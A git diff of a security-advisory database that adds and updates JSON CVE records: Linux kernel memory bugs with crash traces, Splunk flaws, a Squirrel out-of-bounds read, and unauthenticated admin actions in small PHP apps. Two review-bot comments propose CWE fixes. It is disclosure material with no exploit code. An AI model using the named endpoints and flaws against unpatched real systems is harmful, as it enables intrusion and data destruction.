advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json diff --git a/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json b/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json index 34296f8127264..18992c855b6e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json +++ b/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4gm2-v7j4-74p8", - "modified": "2022-05-24T19:05:05Z", + "modified": "2026-02-18T18:30:19Z", "published": "2022-05-24T19:05:05Z", "aliases": [ "CVE-2021-22175" ], "details": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -25,6 +30,10 @@ { "type": "WEB", "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/294178" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22175" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json b/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json index 9f712b78b0ba9..a6f235ddebcc8 100644 --- a/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json +++ b/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json @@ -59,7 +59,8 @@ "database_specific": { "cwe_ids": [ "CWE-200", - "CWE-362" + "CWE-362", + "CWE-413" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json b/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json index c5258203a0c0c..bfdaa829a47db 100644 --- a/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json +++ b/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json @@ -70,6 +70,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1188", "CWE-843", "CWE-863" ], 
diff --git a/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json b/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json index 33a6aa0c2b5dc..18eb340f30b73 100644 --- a/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json +++ b/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json @@ -46,6 +46,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-366", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json index 363cea0377cd2..6a9fb9133ed39 100644 --- a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json +++ b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json @@ -126,6 +126,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1341", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json b/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json index c09713c594b15..fe744acbd6aef 100644 --- a/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json +++ b/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json @@ -147,6 +147,7 @@ "database_specific": { "cwe_ids": [ "CWE-362", + "CWE-366", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json b/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json index f32e842d8d777..9ea353073359f 100644 --- a/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json +++ b/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-416" + "CWE-416", + "CWE-911" ], "severity": "HIGH", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json b/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json index be50268e17c4d..bcba65ece4f7e 100644 --- a/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json +++ b/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2whf-r4r4-c662", - "modified": "2026-02-03T09:30:28Z", + "modified": "2026-02-18T18:30:22Z", "published": "2026-02-03T09:30:28Z", "aliases": [ "CVE-2026-1592" diff --git a/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json new file mode 100644 index 0000000000000..414c99dc1227c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json 
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-365g-rr2h-rx65",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2025-71234"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl8xxxu: fix slab-out-of-bounds in rtl8xxxu_sta_add\n\nThe driver does not set hw->sta_data_size, which causes mac80211 to\nallocate insufficient space for driver private station data in\n__sta_info_alloc(). When rtl8xxxu_sta_add() accesses members of\nstruct rtl8xxxu_sta_info through sta->drv_priv, this results in a\nslab-out-of-bounds write.\n\nKASAN report on RISC-V (VisionFive 2) with RTL8192EU adapter:\n\n BUG: KASAN: slab-out-of-bounds in rtl8xxxu_sta_add+0x31c/0x346\n Write of size 8 at addr ffffffd6d3e9ae88 by task kworker/u16:0/12\n\nSet hw->sta_data_size to sizeof(struct rtl8xxxu_sta_info) during\nprobe, similar to how hw->vif_data_size is configured. This ensures\nmac80211 allocates sufficient space for the driver's per-station\nprivate data.\n\nTested on StarFive VisionFive 2 v1.2A board.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71234"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/116f7bd8160c6b37d1c6939385abf90f6f6ed2f5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/5d810ba377eddee95d30766d360a14efbb3d1872"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/9a0f3fa6ecd0c9c32dbc367a57482bbf7c7d25bf"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:30Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json b/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json
index ed7c19f52426f..1b0108fbfed45 100644
--- a/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json +++ b/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-377" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json new file mode 100644 index 0000000000000..b6f90184c3909 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json 
@@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w2g-4qx3-2mmw", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71232" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Free sp in error path to fix system crash\n\nSystem crash seen during load/unload test in a loop,\n\n[61110.449331] qla2xxx [0000:27:00.0]-0042:0: Disabled MSI-X.\n[61110.467494] =============================================================================\n[61110.467498] BUG qla2xxx_srbs (Tainted: G OE -------- --- ): Objects remaining in qla2xxx_srbs on __kmem_cache_shutdown()\n[61110.467501] -----------------------------------------------------------------------------\n\n[61110.467502] Slab 0x000000000ffc8162 objects=51 used=1 fp=0x00000000e25d3d85 flags=0x57ffffc0010200(slab|head|node=1|zone=2|lastcpupid=0x1fffff)\n[61110.467509] CPU: 53 PID: 455206 Comm: rmmod Kdump: loaded Tainted: G OE -------- --- 5.14.0-284.11.1.el9_2.x86_64 #1\n[61110.467513] Hardware name: HPE ProLiant DL385 Gen10 Plus v2/ProLiant DL385 Gen10 Plus v2, BIOS A42 08/17/2023\n[61110.467515] Call Trace:\n[61110.467516] \n[61110.467519] dump_stack_lvl+0x34/0x48\n[61110.467526] slab_err.cold+0x53/0x67\n[61110.467534] __kmem_cache_shutdown+0x16e/0x320\n[61110.467540] kmem_cache_destroy+0x51/0x160\n[61110.467544] qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467607] ? __do_sys_delete_module.constprop.0+0x178/0x280\n[61110.467613] ? syscall_trace_enter.constprop.0+0x145/0x1d0\n[61110.467616] ? do_syscall_64+0x5c/0x90\n[61110.467619] ? exc_page_fault+0x62/0x150\n[61110.467622] ? 
entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[61110.467626] \n[61110.467627] Disabling lock debugging due to kernel taint\n[61110.467635] Object 0x0000000026f7e6e6 @offset=16000\n[61110.467639] ------------[ cut here ]------------\n[61110.467639] kmem_cache_destroy qla2xxx_srbs: Slab cache still has objects when called from qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467659] WARNING: CPU: 53 PID: 455206 at mm/slab_common.c:520 kmem_cache_destroy+0x14d/0x160\n[61110.467718] CPU: 53 PID: 455206 Comm: rmmod Kdump: loaded Tainted: G B OE -------- --- 5.14.0-284.11.1.el9_2.x86_64 #1\n[61110.467720] Hardware name: HPE ProLiant DL385 Gen10 Plus v2/ProLiant DL385 Gen10 Plus v2, BIOS A42 08/17/2023\n[61110.467721] RIP: 0010:kmem_cache_destroy+0x14d/0x160\n[61110.467724] Code: 99 7d 07 00 48 89 ef e8 e1 6a 07 00 eb b3 48 8b 55 60 48 8b 4c 24 20 48 c7 c6 70 fc 66 90 48 c7 c7 f8 ef a1 90 e8 e1 ed 7c 00 <0f> 0b eb 93 c3 cc cc cc cc 66 2e 0f 1f 84 00 00 00 00 00 55 48 89\n[61110.467725] RSP: 0018:ffffa304e489fe80 EFLAGS: 00010282\n[61110.467727] RAX: 0000000000000000 RBX: ffffffffc0d9a860 RCX: 0000000000000027\n[61110.467729] RDX: ffff8fd5ff9598a8 RSI: 0000000000000001 RDI: ffff8fd5ff9598a0\n[61110.467730] RBP: ffff8fb6aaf78700 R08: 0000000000000000 R09: 0000000100d863b7\n[61110.467731] R10: ffffa304e489fd20 R11: ffffffff913bef48 R12: 0000000040002000\n[61110.467731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\n[61110.467733] FS: 00007f64c89fb740(0000) GS:ffff8fd5ff940000(0000) knlGS:0000000000000000\n[61110.467734] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[61110.467735] CR2: 00007f0f02bfe000 CR3: 00000020ad6dc005 CR4: 0000000000770ee0\n[61110.467736] PKRU: 55555554\n[61110.467737] Call Trace:\n[61110.467738] \n[61110.467739] qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467755] ? 
__do_sys_delete_module.constprop.0+0x178/0x280\n\nFree sp in the error path to fix the crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71232" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/05fcd590e5fbbb3e9e1b4fc6c23c98a1d38cf256" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/19ac050ef09a2f0a9d9787540f77bb45cf9033e8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aed16d37696f494288a291b4b477484ed0be774b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f04840512438ac025dea6e357d80a986b28bbe4c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json b/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json new file mode 100644 index 0000000000000..d86d7cbb0aaa8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json 
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4mcw-fcqm-vqg3",
+ "modified": "2026-02-18T18:30:41Z",
+ "published": "2026-02-18T18:30:41Z",
+ "aliases": [
+ "CVE-2026-2659"
+ ],
+ "details": "A vulnerability was determined in Squirrel up to 3.2. Affected by this vulnerability is the function SQFuncState::PopTarget of the file src/squirrel/squirrel/sqfuncstate.cpp. Executing a manipulation of the argument _target_stack can lead to out-of-bounds read. It is possible to launch the attack on the local host. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2659"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/albertodemichelis/squirrel/issues/311"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oneafter/0122/blob/main/i311/repro"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346457"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346457"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753163"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T18:24:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json
new file mode 100644
index 0000000000000..9197d31f0a4f7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4v8p-q39m-4pj8",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-20137"
+ ],
+ "details": "In Splunk Enterprise versions below 10.2.0, 10.0.3, 9.4.5, 9.3.7, and 9.2.9, and Splunk Cloud Platform versions below 10.1.2507.0, 10.0.2503.9, 9.3.2411.112, and 9.3.2408.122, a low-privileged user who does not hold the \"admin\" or \"power\" Splunk roles could bypass the SPL safeguards for risky commands when they create a Data Model that contains an injected SPL query within an object. They can bypass the safeguards by exploiting a path traversal vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20137"
+ },
+ {
+ "type": "WEB",
+ "url": "https://advisory.splunk.com/advisories/SVD-2026-0202"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T18:24:22Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json b/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json
new file mode 100644
index 0000000000000..81c8fc769fd04
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json
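Review bot: `cwe_ids` in the GHSA-4v8p-q39m-4pj8 record lists only `"CWE-200"`, but the `details` string names a path traversal as the mechanism used to bypass the SPL safeguards for risky commands. Classifying the record purely as information exposure hides the input-handling weakness from anyone grouping or alerting by CWE. Adding the path-traversal class next to it, for example `"CWE-22"`, would match the description, subject to confirmation against SVD-2026-0202.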
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4vmx-r9fj-4cm5",
+ "modified": "2026-02-18T18:30:41Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-20139"
+ ],
+ "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.8, 9.3.9, and 9.2.12, and Splunk Cloud Platform versions below 10.2.2510.3, 10.1.2507.8, 10.0.2503.9, and 9.3.2411.121, a low-privileged user that does not hold the \"admin\" or \"power\" Splunk roles could craft a malicious payload into the `realname`, `tz`, or `email` parameters of the `/splunkd/__raw/services/authentication/users/username` REST API endpoint when they change a password. This could potentially lead to a client‑side denial‑of‑service (DoS). The malicious payload might significantly slow page load times or render Splunk Web temporarily unresponsive.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20139"
+ },
+ {
+ "type": "WEB",
+ "url": "https://advisory.splunk.com/advisories/SVD-2026-0204"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T18:24:26Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json
new file mode 100644
index 0000000000000..5f43ff3dcbfb9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-55vh-w3p8-qq9g",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2025-70141"
+ ],
+ "details": "SourceCodester Customer Support System 1.0 contains an incorrect access control vulnerability in ajax.php. The AJAX dispatcher does not enforce authentication or authorization before invoking administrative methods in admin_class.php based on the action parameter. An unauthenticated remote attacker can perform sensitive operations such as creating customers and deleting users (including the admin account), as well as modifying or deleting other application records (tickets, departments, comments), resulting in unauthorized data modification.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70141"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code"
+ },
+ {
+ "type": "WEB",
+ "url": "https://youngkevinn.github.io/posts/CVE-2025-70141-Customer-Support-BAC"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T17:21:35Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json
new file mode 100644
index 0000000000000..95597dbc48090
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json
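Review bot: `"severity": []` together with `"severity": null` and `"cwe_ids": []` leaves the GHSA-55vh-w3p8-qq9g record unscored, even though its `details` string describes an unauthenticated remote attacker invoking administrative methods through ajax.php, including deletion of the admin account. GHSA-5pqm-c33h-22jc, two files further down, has the same gap for unauthenticated /admin/ actions, while the comparable GHSA-5q5x-wqxc-vv25 record already carries `"CWE-862"` and `CRITICAL`. The values are presumably pending upstream analysis, so consumers should treat a null severity as unknown rather than as below threshold. `"cwe_ids": ["CWE-862"]` would be the matching classification here if upstream confirms it.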
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5jgq-pv8m-5cx7",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2026-23226"
+ ],
+ "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: add chann_lock to protect ksmbd_chann_list xarray\n\nksmbd_chann_list xarray lacks synchronization, allowing use-after-free in\nmulti-channel sessions (between lookup_chann_list() and ksmbd_chann_del).\n\nAdds rw_semaphore chann_lock to struct ksmbd_session and protects\nall xa_load/xa_store/xa_erase accesses.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23226"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/36ef605c0395b94b826a8c8d6f2697071173de6e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://git.kernel.org/stable/c/e4a8a96a93d08570e0405cfd989a8a07e5b6ff33"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json
new file mode 100644
index 0000000000000..89bf8cfaa988e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5pqm-c33h-22jc",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2025-70146"
+ ],
+ "details": "Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70146"
+ },
+ {
+ "type": "WEB",
+ "url": "https://projectworlds.com/online-time-table-generator-php-mysql"
+ },
+ {
+ "type": "WEB",
+ "url": "https://youngkevinn.github.io/posts/CVE-2025-70146-OTTTG-Unauth-Deletion"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T17:21:35Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json b/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json
new file mode 100644
index 0000000000000..5ae2cdead35c8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5q5x-wqxc-vv25",
+ "modified": "2026-02-18T18:30:40Z",
+ "published": "2026-02-18T18:30:40Z",
+ "aliases": [
+ "CVE-2025-70150"
+ ],
+ "details": "CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70150"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.phpscriptsonline.com/product/membership-management-software"
+ },
+ {
+ "type": "WEB",
+ "url": "https://youngkevinn.github.io/posts/CVE-2025-70150-Membership-Unauth-Delete"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T18:24:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json
new file mode 100644
index 0000000000000..9c236c4a9f1b4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json
@@ -0,0 +1,41 @@
+{
+ "schema_version": "1.4.0",
